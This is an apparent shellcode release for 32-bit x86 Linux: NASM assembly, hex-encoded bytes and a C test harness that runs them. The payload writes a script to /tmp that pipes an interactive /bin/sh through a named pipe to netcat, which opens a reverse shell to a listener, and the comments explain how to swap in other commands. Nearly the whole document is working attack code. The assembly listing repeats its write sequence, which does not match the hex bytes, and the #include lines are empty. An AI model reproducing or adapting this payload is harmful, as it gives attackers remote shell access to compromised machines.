/* ;author: Filippo "zinzloun" Bersani ;date: 05/12/2016 ;version: 1.0 ;X86 Assembly/NASM Syntax ;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit ; Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit ; Linux bb32 4.4.0-45-generic 32bit ; description: get a reverse shell executing a shell script saved in tmp that execute netcat that reverse the shell to the listener, considering that by now the default nc configuration does not permitt to execute (-e) command directly anymore this is a different approach that permitt to execute not only netcat. LIMITATION: size of the shellcode; the attacker has to have gained the privilege to execute commmand (/bin/bash) ; see comment for details global _start section .text _start: CreateFile: xor eax, eax ;zeroing xor edx, edx push eax ;NULL byte as string terminator push 0x65782e2f ;name of file to be executed /tmp/.xe push 0x706d742f mov ebx, esp ;ebx point to pushed string mov esi, esp ;save the name of the file for a later use mov al,0x8 ;create the file... mov cl,077o ;...with 77 permission in octal (to avoid 0) int 0x80 jmp CallPop WriteString: pop ecx ;get the command string to write in the file, 3rd arg mov ebx,eax ;save the returned value of the previous sys call (fd) into ebx, 2nd arg mov dl,0x09 ;now we put value $0x09 into dl... inc dl ;0x09 + 1 == 0x0A, get the bad Line feed char ;) mov byte [ecx+92],dl ;replace our R char with 0x0A * xor edx,edx mov dl,93 ;len of the buffer to write, 4th arg ** mov al,0x04 ;sys call to write the file int 0x80 mov ebx,eax ;save the returned value of the previous sys call (fd) into ebx, 2nd arg mov dl,0x09 ;now we put value $0x09 into dl... inc dl ;0x09 + 1 == 0x0A, get the bad Line feed char ;) mov byte [ecx+92],dl ;replace our R char with 0x0A * xor edx,edx mov dl,93 ;len of the buffer to write, 4th arg ** mov al,0x04 ;sys call to write the file int 0x80 CloseFile: xor eax,eax mov al, 0x6 ;close the stream file int 0x80 ExecFile: xor eax, eax push eax ;push null into the stack ;push ////bin/bash into the stack push 0x68736162 push 0x2f6e6962 push 0x2f2f2f2f mov ebx,esp ;set the 1st arg /bin/bash from the stack ;set up the args array push eax ; null push esi ; get the saved pointer to the /tmp/.xe push ebx ; pointer to /bin/bash mov ecx, esp ;set the args xor edx,edx mov al, 0xb ;sys call 11 to execute the file int 0x80 CallPop: call WriteString ;this string can be configured to execute other command too, you have only to adjust the length of the buffer (**) and the index of the char (R) to replace (*) ;according to the length of the string db "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | /bin/nc localhost 9999 > /tmp/fR" */ #include #include unsigned char code[] = \ "\x31\xc0\x31\xd2\x50\x68\x2f\x2e\x78\x65\x68\x2f\x74\x6d\x70\x89\xe3\x89\xe6\xb0\x08\xb1\x3f\xcd\x80\xeb\x37\x59\x89" "\xc3\xb2\x09\xfe\xc2\x88\x51\x5c\x31\xd2\xb2\x5d\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68" "\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x56\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xe8\xc4\xff\xff\xff\x72\x6d\x20\x2d\x66" "\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x20\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x20\x63\x61\x74\x20\x2f\x74\x6d\x70\x2f" "\x66\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x69\x20\x32\x3e\x26\x31\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x6e\x63\x20\x20\x6c\x6f" "\x63\x61\x6c\x68\x6f\x73\x74\x20\x39\x39\x39\x39\x20\x3e\x20\x2f\x74\x6d\x70\x2f\x66\x52"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }